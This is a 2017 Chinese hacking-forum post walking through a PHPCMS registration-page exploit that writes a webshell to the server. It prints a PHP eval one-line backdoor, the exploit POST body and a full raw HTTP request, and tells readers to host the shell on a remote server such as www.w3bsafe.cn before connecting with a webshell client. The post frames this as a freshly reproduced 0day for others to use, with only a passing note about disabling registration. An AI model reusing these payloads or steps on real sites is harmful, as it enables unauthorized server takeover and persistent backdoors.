本帖最后由 小爱_Joker 于 2017-4-10 10:05 编辑
去年的漏洞复现了 本地环境搭建 在官方下载的最新版本phpcms源码我冒着生命危险 放出的0day
QQ图片20170410171149.jpg (14.64 KB, 下载次数: 81)
2017-4-10 17:11 上传
各位看完后 记得评论下
QQ截图20170410163900.png (56.14 KB, 下载次数: 92)
2017-4-10 16:46 上传
主要是注册哪里 post提交
QQ截图20170410164727.png (58.15 KB, 下载次数: 79)
2017-4-10 16:47 上传
这里我在本地准备一个1.txt文件 我们的一句话
[AppleScript] 纯文本查看 复制代码<?php @eval($_POST[cmd]);?>
0day
[AppleScript] 纯文本查看 复制代码siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=&dosubmit=1&protocol=
QQ截图20170410165025.png (106.1 KB, 下载次数: 89)
2017-4-10 16:50 上传
也可以在远程服务器 放一个文本文件
http://192.168.0.3/phpcms/1.txt
远程服务器 比如 我在www.w3bsafe.cn/1.txt 放一个一句话 txt文件的
改下0day即可
是我本地的文件文件地址 里面有一句话 上面我说了
QQ截图20170410165220.png (35.59 KB, 下载次数: 89)
2017-4-10 16:52 上传
Post提交一下
QQ截图20170410165436.png (82.18 KB, 下载次数: 104)
2017-4-10 16:54 上传
菜刀链接
QQ截图20170410165535.png (55.3 KB, 下载次数: 92)
2017-4-10 16:55 上传
burp操作验证
QQ截图20170410180203.png (97.61 KB, 下载次数: 103)
2017-4-10 18:02 上传
QQ截图20170410180216.png (19.11 KB, 下载次数: 81)
2017-4-10 18:02 上传
回显操作失败 但是他已经写入进去了
1.gif (746 KB, 下载次数: 89)
2017-4-10 18:04 上传
[AppleScript] 纯文本查看 复制代码POST /phpcms/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1
Host: 192.168.0.3
Content-Length: 158
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: [url]http://192.168.0.3[/url]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: [url]http://192.168.0.3/phpcms/index.php?m=member&c=index&a=register&siteid=1[/url]
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: duiqS_admin_username=e2148Lx9jxWqd27zJW60NoZECjpCzY-kJHaDRtsJdNN-D14; duiqS_siteid=7f10PWN8e2aLJ8cDReSbX_NTPYZUwUTTf0QLOMix; duiqS_userid=d73dm3IxOKQZiIl0oDUfv1qRKPN7eYkeRy4xYTe2; duiqS_admin_email=fe549jr0y5NPbP8-awEI3pa2RERM9d6oloN6wm9p0LqSCnT0MqQ69lB8RxYNpA; duiqS_sys_lang=ed63dNwVysDCLfwqVe_ZO7ldqXSRC0O1cpABQ5YimBw-4A; BEEFHOOK=Y2fW9i6P441d2vBvjLkgKjlcdTaAj8URI1T1Z7Wx9nZtMJEcrTkp5o7B0uI7AjQr5RsfoGc8ZtlG8U3F; PHPSESSID=o2l47tha69a46khl82341gc8m0
Connection: close
siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=&dosubmit=1&protocol=
总结:自我感觉 关闭注册 临时解决 =-= 官方会出补丁
结束语:黑阔们轻点. 毕竟这个漏洞刚复现不久 ....
pdf文件
2017-4-10 17:04 上传
点击文件名下载附件
下载积分: 魔法币 -5
看文章记得评论下 感谢. 拒绝伸手党